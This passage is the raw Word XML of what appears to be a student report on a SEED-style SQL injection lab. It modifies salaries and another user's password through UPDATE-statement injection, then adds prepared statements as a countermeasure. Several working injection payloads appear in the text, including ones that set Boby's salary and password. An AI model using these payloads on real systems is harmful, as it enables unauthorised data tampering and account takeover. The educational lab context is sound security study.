          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEBDEA3" w14:textId="3019FE8C" w:rsidR="009B2206" w:rsidRDefault="009B2206" w:rsidP="009B2206">
      <w:pPr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’ and Password=’</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00085847">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>…..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70471EBE" w14:textId="43EF6DA2" w:rsidR="005B540D" w:rsidRDefault="005B540D" w:rsidP="009B2206">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534DA78F" w14:textId="36F284FE" w:rsidR="005B540D" w:rsidRDefault="005B540D" w:rsidP="009B2206">
      <w:pPr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Since there is a “;” mark, variable “$</w:t>
      </w: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sql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>” should be regarded as 2instructions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F89E1D" w14:textId="0941514E" w:rsidR="00E67183" w:rsidRDefault="00D14BD0" w:rsidP="003F3CEC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29D8DC21" wp14:editId="3BF70E02">
            <wp:extent cx="3181900" cy="15265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584" cy="15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3EF" w14:textId="17EEC3CE" w:rsidR="00582C9A" w:rsidRDefault="00D86995" w:rsidP="003F3CEC">
      <w:r>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDA64AB" w14:textId="07B499D7" w:rsidR="00D86995" w:rsidRDefault="00FE22B5" w:rsidP="003F3CEC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60AB6032" wp14:editId="38658AAE">
            <wp:extent cx="5274310" cy="13646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8C87" w14:textId="532D2F56" w:rsidR="00700540" w:rsidRDefault="00700540" w:rsidP="003F3CEC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00DC66B5">
        <w:t>task fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F88AD2A" w14:textId="54A9949C" w:rsidR="00B97815" w:rsidRPr="003F3CEC" w:rsidRDefault="00B97815" w:rsidP="003F3CEC">
      <w:r>
        <w:t>The reason this can happen is that in the server, we use query function to execute SQL instructions. In th</w:t>
      </w:r>
      <w:r w:rsidR="00D17793">
        <w:t xml:space="preserve">is case, there will be a syntax. If we want to run multiple </w:t>
      </w:r>
      <w:r w:rsidR="00B52AD3">
        <w:t xml:space="preserve">instructions, the server code should use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B52AD3">
        <w:t>multi_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B52AD3">
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B52AD3">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B52AD3">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C34ED29" w14:textId="55544CF9" w:rsidR="00CA349C" w:rsidRDefault="00265031" w:rsidP="008037F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00265031">
        <w:lastRenderedPageBreak/>
        <w:t>Task 3: SQL Injection Attack on UPDATE Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E19CC4B" w14:textId="642C71CC" w:rsidR="0064219E" w:rsidRPr="0064219E" w:rsidRDefault="0064219E" w:rsidP="0064219E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Task 3.1: Modify your own salary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6D0E1" w14:textId="6AD90629" w:rsidR="002C1BBD" w:rsidRDefault="004A1E63" w:rsidP="00A55894">
      <w:r>
        <w:t>Firstly, login as Alice and go to the edit profile page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE4370" w14:textId="30208036" w:rsidR="004A1E63" w:rsidRDefault="004A1E63" w:rsidP="00A55894">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73DCC9E9" wp14:editId="2F37D7B8">
            <wp:extent cx="2927927" cy="1807658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942" cy="18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76C3" w14:textId="402BDDAE" w:rsidR="00C372E1" w:rsidRDefault="00C372E1" w:rsidP="00A55894">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE443D6" wp14:editId="49AB4A23">
            <wp:extent cx="5274310" cy="1624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55BE" w14:textId="015E1B09" w:rsidR="008F5499" w:rsidRDefault="008F5499" w:rsidP="00A55894">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hen</w:t>
      </w:r>
      <w:r w:rsidR="00C372E1">
        <w:t xml:space="preserve">, fill in blanks and add </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C372E1">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="007F7BE0">
        <w:t>,salary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007F7BE0">
        <w:t>=10</w:t>
      </w:r>
      <w:r w:rsidR="00C372E1">
        <w:t>0000”</w:t>
      </w:r>
      <w:r w:rsidR="00C70967">
        <w:t>. From the screenshot above, we can see that Alice’</w:t>
      </w:r>
      <w:r w:rsidR="00297825">
        <w:t>s salary now is 20000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123FE51D" w14:textId="51767600" w:rsidR="00DF741C" w:rsidRDefault="00576B0C" w:rsidP="00A55894">
      <w:r>
        <w:t>123</w:t>
      </w:r>
      <w:r w:rsidR="00DF741C" w:rsidRPr="00DF741C">
        <w:t>', salary=</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF741C">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00DF741C" w:rsidRPr="00DF741C">
        <w:t>100000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016EF862" w14:textId="1AFCAEB6" w:rsidR="00297825" w:rsidRDefault="00952CF3" w:rsidP="00A55894">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AC73669" wp14:editId="4BFDF837">
            <wp:extent cx="2825467" cy="2093077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3130" cy="20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7E17" w14:textId="60AA1FAF" w:rsidR="009B52AF" w:rsidRDefault="00F12984" w:rsidP="00A55894">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ave and </w:t>
      </w:r>
      <w:r w:rsidR="007C3322">
        <w:t>check Alice’s salary</w:t>
      </w:r>
      <w:r w:rsidR="005A0A48">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E5C54" w14:textId="3D529CFA" w:rsidR="00531F4E" w:rsidRDefault="00531F4E" w:rsidP="00A55894">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7625A6CD" wp14:editId="34265333">
            <wp:extent cx="3089707" cy="28066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930" cy="28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5C7" w14:textId="64B12FCA" w:rsidR="0093067C" w:rsidRDefault="005941D5" w:rsidP="00A55894">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>s we can</w:t>
      </w:r>
      <w:r w:rsidR="004E652E">
        <w:t xml:space="preserve"> see, the salary becomes 100000</w:t>
      </w:r>
      <w:r w:rsidR="0093067C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C833D88" w14:textId="143643FA" w:rsidR="00C32924" w:rsidRDefault="00C32924" w:rsidP="00C32924">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Task 3.2: Modify other people’ salary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA79CF" w14:textId="04D19E94" w:rsidR="00E73F9C" w:rsidRDefault="00491720" w:rsidP="00E73F9C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>he strategy is simple. I just need to change the condition of id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BD448A" w14:textId="706D6692" w:rsidR="00627B57" w:rsidRDefault="00627B57" w:rsidP="00E73F9C">
      <w:r>
        <w:t xml:space="preserve">Now, the </w:t>
      </w:r>
      <w:r w:rsidR="005E434E">
        <w:t>statement</w:t>
      </w:r>
      <w:r w:rsidR="00084665">
        <w:t xml:space="preserve"> is like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2F79D" w14:textId="19CE3AE4" w:rsidR="00A97A65" w:rsidRDefault="00AB0A28" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08D14BFB" wp14:editId="2ADF2633">
            <wp:extent cx="5274310" cy="579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FB7" w14:textId="4BF493F3" w:rsidR="00F671F9" w:rsidRDefault="002B369E" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="006B6ECC">
        <w:t xml:space="preserve">e notice that the condition of id is right behind </w:t>
      </w:r>
      <w:r w:rsidR="00BA5D95">
        <w:t>the field phone number.</w:t>
      </w:r>
      <w:r w:rsidR="00F671F9">
        <w:t xml:space="preserve"> Thus, we can </w:t>
      </w:r>
      <w:r w:rsidR="000C3B1A">
        <w:t xml:space="preserve">change the SQL instruction </w:t>
      </w:r>
      <w:r w:rsidR="00BD4E00">
        <w:t>by modifying the phone number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DCB4B6" w14:textId="47186C7A" w:rsidR="00BD4E00" w:rsidRDefault="00EC1CCC" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F065E8A" wp14:editId="7B8942B2">
            <wp:extent cx="3289123" cy="260049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822" cy="26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106A" w14:textId="4E8D89F4" w:rsidR="001C743A" w:rsidRDefault="006B6536" w:rsidP="00084665">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B6536">
        <w:t>',salary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B6536">
        <w:t>='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F22644" w14:textId="60797A37" w:rsidR="006B6536" w:rsidRDefault="00E74BFB" w:rsidP="00084665">
      <w:r w:rsidRPr="00E74BFB">
        <w:t>' where name='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E74BFB">
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E74BFB">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00A91920">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E74BFB">
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52750F" w14:textId="14452218" w:rsidR="00315F36" w:rsidRDefault="00315F36" w:rsidP="00084665">
      <w:r>
        <w:t>After saving, check the salary list in SQL commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B39B9AD" w14:textId="2B81F0CF" w:rsidR="00315F36" w:rsidRDefault="00F271CF" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79CB1652" wp14:editId="06AB700C">
            <wp:extent cx="3033905" cy="17890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9856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0AC5" w14:textId="4B669A51" w:rsidR="004B115F" w:rsidRDefault="007F6ABA" w:rsidP="00084665">
      <w:r>
        <w:t xml:space="preserve">As we can see, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Boby’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B115F">
        <w:t xml:space="preserve"> salary is changed to 1</w:t>
      </w:r>
      <w:r w:rsidR="00404188">
        <w:t xml:space="preserve"> successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3AEF0A" w14:textId="098261DC" w:rsidR="00404188" w:rsidRDefault="00531C18" w:rsidP="00531C18">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Task 3.3: Modify other people’ password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC45F05" w14:textId="2EB15EF2" w:rsidR="00C27D28" w:rsidRDefault="00EF0095" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">In this task, because the password field is </w:t>
      </w:r>
      <w:r w:rsidR="000B5614">
        <w:t xml:space="preserve">not plain text in the </w:t>
      </w:r>
      <w:r w:rsidR="004273E1">
        <w:t>SQL in</w:t>
      </w:r>
      <w:r w:rsidR="00254A17">
        <w:t xml:space="preserve">struction, we need to replace the whole </w:t>
      </w:r>
      <w:r w:rsidR="00397FF2">
        <w:t xml:space="preserve">field. However, if </w:t>
      </w:r>
      <w:r w:rsidR="00893AB8">
        <w:t>password field we fill in is empty,</w:t>
      </w:r>
      <w:r w:rsidR="0001193F">
        <w:t xml:space="preserve"> the if condition will choose an update strategy without changing password.</w:t>
      </w:r>
      <w:r w:rsidR="00C27D28">
        <w:t xml:space="preserve"> We change the password to 123.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1653D52D" w14:textId="34050000" w:rsidR="00CF7CAB" w:rsidRDefault="00CF7CAB" w:rsidP="00084665">
      <w:r>
        <w:t xml:space="preserve">We also know that the </w:t>
      </w:r>
      <w:r w:rsidR="00145758">
        <w:t xml:space="preserve">password is </w:t>
      </w:r>
      <w:r w:rsidR="00C61C55">
        <w:t xml:space="preserve">the hash code </w:t>
      </w:r>
      <w:r w:rsidR="00396E0E">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="007C324B">
        <w:t xml:space="preserve">some plain text. </w:t>
      </w:r>
      <w:r w:rsidR="00243AC4">
        <w:t xml:space="preserve">Thus, we can calculate some value’s </w:t>
      </w:r>
      <w:r w:rsidR="004B0D1C">
        <w:t xml:space="preserve">SHA1 </w:t>
      </w:r>
      <w:r w:rsidR="00C168BA">
        <w:t>hash value</w:t>
      </w:r>
      <w:r w:rsidR="001F5A17">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00A75DDD">
        <w:t xml:space="preserve">use as </w:t>
      </w:r>
      <w:r w:rsidR="0088130E">
        <w:t>a record in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BDE7A0" w14:textId="6CA99A2B" w:rsidR="0088130E" w:rsidRDefault="00055B7A" w:rsidP="00084665">
      <w:r>
        <w:t xml:space="preserve">An easier way is to </w:t>
      </w:r>
      <w:r w:rsidR="00D36497">
        <w:t xml:space="preserve">use the phone number field to change the </w:t>
      </w:r>
      <w:r w:rsidR="0048447B">
        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidR="00AB45CF">
        <w:t>, in this case the password will be t</w:t>
      </w:r>
      <w:r w:rsidR="008340BF">
        <w:t>ransformed into SHA1 value auto</w:t>
      </w:r>
      <w:r w:rsidR="00AB45CF">
        <w:t>matically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D9F4C" w14:textId="2FE3A26C" w:rsidR="00AB45CF" w:rsidRDefault="00AB45CF" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C576C2A" wp14:editId="069D7E63">
            <wp:extent cx="5274310" cy="194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C46D" w14:textId="418A5960" w:rsidR="00AB45CF" w:rsidRDefault="00AB45CF" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C31450F" wp14:editId="184AA672">
            <wp:extent cx="2520714" cy="167551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6593" cy="16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8F50" w14:textId="41830193" w:rsidR="00807CE5" w:rsidRDefault="00807CE5" w:rsidP="00084665">
      <w:r>
        <w:t>In this case, the password field will still make effects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E04BF4" w14:textId="5493431C" w:rsidR="00A84B73" w:rsidRDefault="002C4B56" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30825A78" wp14:editId="572321EA">
            <wp:extent cx="2975764" cy="117654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8564" cy="118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691C" w14:textId="79D8FDF3" w:rsidR="00807CE5" w:rsidRDefault="00DB63E2" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C697815" wp14:editId="33710542">
            <wp:extent cx="4365863" cy="158056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659" cy="15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B5B" w14:textId="4F5C665D" w:rsidR="002C4B56" w:rsidRDefault="00964AF8" w:rsidP="00084665">
      <w:r>
        <w:t xml:space="preserve">Though there is an error message, we noticed that </w:t>
      </w:r>
      <w:r w:rsidR="00EA068C">
        <w:t>we changed the</w:t>
      </w:r>
      <w:r w:rsidR="00886697">
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
      <w:r w:rsidR="00EA068C">
        <w:t xml:space="preserve"> value successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CFCD5C" w14:textId="2DAB60A0" w:rsidR="006657A0" w:rsidRDefault="00B927B1" w:rsidP="00084665">
      <w:r>
        <w:t>Login using password 123:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A69B9D" w14:textId="098B1955" w:rsidR="00B927B1" w:rsidRDefault="00912464" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C9F5A05" wp14:editId="0FC2CF4B">
            <wp:extent cx="2413892" cy="1807658"/>
            <wp:effectExtent l="0" t="0" r="571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4518" cy="18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8E59" w14:textId="4F9F4468" w:rsidR="007B0403" w:rsidRDefault="007B0403" w:rsidP="00084665">
      <w:r>
        <w:t xml:space="preserve">It seems that </w:t>
      </w:r>
      <w:r w:rsidR="000702A8">
        <w:t>the change is successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C10238C" w14:textId="5AFBDAF8" w:rsidR="00B43841" w:rsidRDefault="00931918" w:rsidP="00084665">
      <w:r>
        <w:t xml:space="preserve">Below it is an </w:t>
      </w:r>
      <w:r w:rsidR="00B43841">
        <w:t xml:space="preserve">extension </w:t>
      </w:r>
      <w:r w:rsidR="00C966C7">
        <w:t>I made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7913ECAD" w14:textId="3D971C69" w:rsidR="00AB45CF" w:rsidRDefault="00E0084D" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">By the way, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if the last field is password’s hash instead of </w:t>
      </w:r>
      <w:r w:rsidR="0051715F">
        <w:t xml:space="preserve">plaintext of phone number, we can pre-calculate our </w:t>
      </w:r>
      <w:r w:rsidR="00374E99">
        <w:t>password’s hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F069A54" w14:textId="024CA19C" w:rsidR="00DD181D" w:rsidRDefault="00DD181D" w:rsidP="00084665">
      <w:r>
        <w:t>SHA1 value of Alice’s password “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seedalice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E099EA" w14:textId="3D38AF69" w:rsidR="00DD181D" w:rsidRDefault="00D024A7" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="036F767B" wp14:editId="69BFE83D">
            <wp:extent cx="2865941" cy="1775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1915" cy="17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32A6" w14:textId="3DC57129" w:rsidR="00515936" w:rsidRPr="00404188" w:rsidRDefault="00805081" w:rsidP="00084665">
      <w:r w:rsidRPr="00805081">
        <w:t>fdbe918bdae83000aa54747fc95fe0470fff4976</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675BB343" w14:textId="04234179" w:rsidR="00FF6B5F" w:rsidRDefault="004D0270" w:rsidP="00084665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE6F4E">
        <w:t>adress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F67E34">
        <w:t xml:space="preserve"> as follow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667225E2" w14:textId="77777777" w:rsidR="006E26CB" w:rsidRDefault="00701873" w:rsidP="00701873">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00701873">
        <w:t>', Password= 'fdbe918bdae83000aa54747fc95fe0470fff4976'</w:t>
      </w:r>
      <w:r w:rsidR="009A4738">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009A4738" w:rsidRPr="009A4738">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4738">
        <w:t>PhoneNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4738">
        <w:t>='</w:t>
      </w:r>
      <w:r w:rsidR="009A4738" w:rsidRPr="009A4738">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00701873">
        <w:t xml:space="preserve"> where name='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00701873">
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00701873">
        <w:t>'; #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D683BC" w14:textId="2FAEFCA0" w:rsidR="00A655BC" w:rsidRDefault="00A655BC" w:rsidP="00084665"/>
    <w:p w14:paraId="7D0979FD" w14:textId="5458EBDA" w:rsidR="006A31B0" w:rsidRDefault="00002EB5" w:rsidP="001B2884">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00002EB5">
        <w:t>Task 4: Countermeasure — Prepared Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5BA5B5" w14:textId="1AAF2BCB" w:rsidR="001259C7" w:rsidRDefault="007914E4" w:rsidP="001259C7">
      <w:r>
        <w:t>Firstly</w:t>
      </w:r>
      <w:r w:rsidR="006825E2">
        <w:t xml:space="preserve">, fix the problem </w:t>
      </w:r>
      <w:r w:rsidR="00BF68B4">
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:r w:rsidR="00E768B4">
        <w:t>login page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2FCA96" w14:textId="6D8D332F" w:rsidR="00E768B4" w:rsidRPr="00F30D14" w:rsidRDefault="00E25B21" w:rsidP="001259C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">unsafe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>home.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71A36E2C" w14:textId="59B7A002" w:rsidR="002F1179" w:rsidRDefault="006E5DB9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4825A1E" wp14:editId="0BF63F47">
            <wp:extent cx="5274310" cy="21456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1533" w14:textId="3833E218" w:rsidR="00396B8F" w:rsidRDefault="00396B8F" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Restart the apache server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39758A63" w14:textId="16C91378" w:rsidR="00396B8F" w:rsidRDefault="00396B8F" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> service apache2 restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC8E21" w14:textId="1C4ABC0E" w:rsidR="00396B8F" w:rsidRDefault="00962592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51FBFEB" wp14:editId="623CA2A8">
            <wp:extent cx="3226918" cy="17389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145" cy="17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496" w14:textId="023CA9C5" w:rsidR="00412124" w:rsidRDefault="00412124" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Use the original password to login.</w:t>
      </w:r>
